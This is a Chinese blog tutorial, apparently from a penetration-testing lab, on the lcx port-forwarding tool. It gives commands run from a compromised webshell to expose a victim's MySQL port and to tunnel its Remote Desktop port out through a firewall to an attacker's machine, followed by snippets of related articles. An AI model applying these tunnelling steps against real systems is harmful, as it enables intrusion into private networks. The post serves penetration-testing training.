lcx端口转发

最新推荐文章于 2024-03-31 21:43:45 发布
最新推荐文章于 2024-03-31 21:43:45 发布
阅读量3.3k 收藏 12
点赞数 4
分类专栏: 端口转发 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122235884
版权

lcx端口转发:

本文主要通过讲解lcx的本地端口及远程端口转发,让能熟练使用lcx端口转发工具,对端口转发知识有更加深入了解,本次实验靶场来源于暗月(moonsec)师傅,本文内容全由本人通过学习理解编制,文中若有错处,大佬勿喷,个人学艺不精;所以想学习更多的渗透知识请找暗月师傅。

描述:

lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个
回路。它常用于外网连接内网3389端口。

lcx命令:
     -listen  #远程端口转发使用,在客户端开启
     -tran    #主要用于本地端口转发使用
     -slave   #远程端口转发使用,在服务端开启

本地端口转发:

这里可以看出3306端口只能在本地运行,所以需要通过-tran 将本地的端口进行转发。
在这里插入图片描述
我们将本地3306端口通过3307转发出来,这样当我们知道了Mysql密码后,就可以进行连接

在webshell上面运行lcx:

 lcx.exe -tran 3307 127.0.0.1 3306

在这里插入图片描述
本地查看3307端口是否开启:
在这里插入图片描述
kali通过远程连接3307端口访问到了192.168.1.7的3306端口:
在这里插入图片描述

远程端口转发:

通过本地的51端口来转发远程的3389端口:
为测试效果真实,已将防火墙打开,并将远程端口3389进行限制:
在这里插入图片描述
可以看出已经无法连接:
在这里插入图片描述

第一种场景:

服务端主动连接 客户端2333端口
本地访问127.0.0.1:51端口即可访问服务端上3389端口
首先在本地开启:

lcx -listen 51 2333

在这里插入图片描述
在webshell上运行:

lcx.exe -slave 192.168.1.5 2333 127.0.0.1 3389

在这里插入图片描述
此数据是通过服务端主动连接客户端,这样是可以直接穿透防火墙。

第二种场景:

就是让攻击者能够访问,那只需要攻击者的IP能够访问客户端即可。 就例如 客户端是一个公网的VPS,将VPS的上的51端口放出来,让攻击者可以访问;在攻击者电脑上,远程连接192.168.1.5:51 即可。
在这里插入图片描述

个人理解总结:

1、假设192.168.45.128是攻击者,192.168.1.7就是被获取了webshell的地址 现在只有192.168.1.5也就是客户端可以进行访问,但攻击者不能;
2、我们在客户端上开启端口转发,-listen 51 2333(将本地的51端口,转发至2333端口);
3、然后在被获取webshell的地址上,主动去连接2333端口 -slave 192.168.1.5 2333 127.0.0.1 3389(主动用2333连接本地3389) ;
4、我们的客户端就可以通过127.0.0.1:51端口去远程访问192.168.1.7上面的3389端口;
5、如果我们的攻击者能够访问到客户端的51端口,那么同样他也可以通过192.168.1.5:51这样去连接192.168.1.7上面的3389;
6、这样就通过端口转发建立了一条隧道,让本不互通的内网的攻击者同样可以访问到受害者内网。

全局变量Global
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
windows使用lcx端口转发登陆远程主机
11-17 405
成功访问,并通过主控制机192.168.31.248 的 3389端口经 51端口转发到192.168.31.211被控制机的3389端口。从第三台主机连接主控制主机3389端口,会直接转发到被控制机的3389端口。192.168.31.211为被控制主机,3389为被控制主机端口。192.168.31.248为远程主控制主机,51为远程主机端口。监听51端口连接并转发到本地3389端口。注:被控制主机上要开启3389端口。启动远程桌面连接,访问主控制主机。成功通过端口转发登陆被控制主机。
隐藏隧道通信:lcx 端口转发
f_carey的博客
10-17 4241
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 隐藏隧道通信:lcx 端口转发 1 lcx 端口转发原理 lcx 是基于 Socket 套接字实现的端口转发工具,Windows 版本名称为 LCX、Linux 版本为 portmap。 一个基本的 Socket 隧道必须包含两端: 服务端:监听一个端口,等待客户端连接 客户端:通过传入服务端的 IP 地址和.
端口转发,LCX
Martin-share的博客
02-08 755
端口转发,LCX
frp+lcx代理使用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 967
fps+lcx代理使用
LCX端口转发
最新发布
weixin_45653478的博客
03-31 484
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。Windows版的LCX用法:端口转发Lcx -listen Lcx -slave
远程桌面连接:使用lcx进行端口转发
qiuqiunile_的博客
09-18 2432
一、lcx介绍 lcx是一个基于Socket套接字实现的端口转发工具,有Linux和Windows两个版本。比如说,当目标机器开放了3389端口,我们可以将目标机器的3389端口转发到我们自己的外网主机上的某个端口,然后我们在本地机访问外网主机的端口,进而在本地连接到目标机器的远程终端并进行管理。 二、准备 一个Socket隧道必须具备两端: 服务端(外网机):监听端口 客户端(目标机):传入服务端的ip地址和端口 这边我们使用vps(虚拟专用服务器)作为服务端。 三、具体步骤 目标机器 1、查看338
[端口转发]lcx端口转发
baguangman5501的博客
09-17 218
0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上。但这个工具同样适用于运维工程师进行远程内网维护。 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网IP即可。...
端口转发lcx
weixin_30703911的博客
08-21 451
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap Windows版使用方法如下: lcx有两大功能: 1)端口转发(listen和slave成对使用) 2)端口映射(tran) 1、lcx 内网端口转发(1)、内网主机上执行:lcx.exe –slave 公网主机i...
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
lcx修改版,端口转发工具,内网端口转外网
04-28
内网打洞工具,原理同lcx,但是更强大,方便。
重写端口转发工具lcx(跨平台).zip
10-04
重写端口转发工具lcx(跨平台).zip
lcx - HTran 端口转发工具delphi-资料.pas
06-28
* : ======================== HUC Packet Transmit Tool V1.00 ======================= * : =========== Code by lion & bkbll, Welcome to http://www.cnhonker.com ========== * : * : [Usage of Packet Transmit:] * : HTran -<listen|tran|slave> <option> [-log logfile] * : * : [option:] * : -listen <ConnectPort> <TransmitPort> * : -tran <ConnectPort> <TransmitHost> <TransmitPort> * : -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
lcx端口转发神器
07-08
lcx会被查出病毒,用起来蛮顺手的。
lcx端口内网转发工具
07-14
lcx端口转发
网络测试中端口转发工具(lcx.exe,portmap)利用简析
Alexz__的博客
03-30 4211
1,端口转发含义 2,lcx.exe工具使用 3,portmap脚本使用 4,简单的ssh登录端口转发 5,端口转发实现http包转发 壹 什么是端口转发 端口转发,有时也被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络节点到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内...
LCX端⼝转发
good good study
01-31 1145
LCX是一款十分经典的内网端口转发工具,基于Socket套接字,具有端口转发和端口映射的功能。但是目前很多杀软已经将其加入了特征库,在实际利用的时候需要自行做免杀处理。lcx有三个功能:第一个功能将本地端口转发到本地另一个端口上第二个功能将本地端口准发到其他主机某个端口上(端口映射)第三个功能是进行监听并进行转发使用, 提取码:fn9o。
lcx端口转发及远程终端问题
haoge1998的博客
04-27 947
lcx端口转发及远程终端问题 一、lcx端口转发 1、描述 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。 2、lcx命令 [option:] -listen <ConnectPort> <Transm
android lcx
11-29
Android LCX是一种基于Android系统的定制版操作系统,它经过定制和优化,以满足特定的用户需求。LCX系统的引入可以增加手机的性能,减少系统开销,提高系统的稳定性和用户体验。 与传统的Android系统相比,Android LCX在界面设计、系统内核优化、应用管理、电池管理、性能调优等方面都有所突破和改进。用户可以在LCX系统中享受到更加流畅和稳定的操作体验。 除此之外,Android LCX还具有强大的安全功能,能够通过加密技术和权限管理系统确保用户数据的安全性。用户可以放心地使用手机进行各种操作,而不必担心个人信息被泄露或遭受恶意攻击。 值得一提的是,Android LCX系统还支持各种定制化的功能和服务,用户可以根据自己的需求选择安装各种应用和插件,从而使手机的功能更加丰富多样。 总的来说,Android LCX系统不仅仅是对Android系统的简单修改,更是在原有基础上进行了全面的优化和改进。无论是在性能、稳定性、安全性还是功能定制化方面,LCX系统都能为用户带来更加出色的使用体验。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值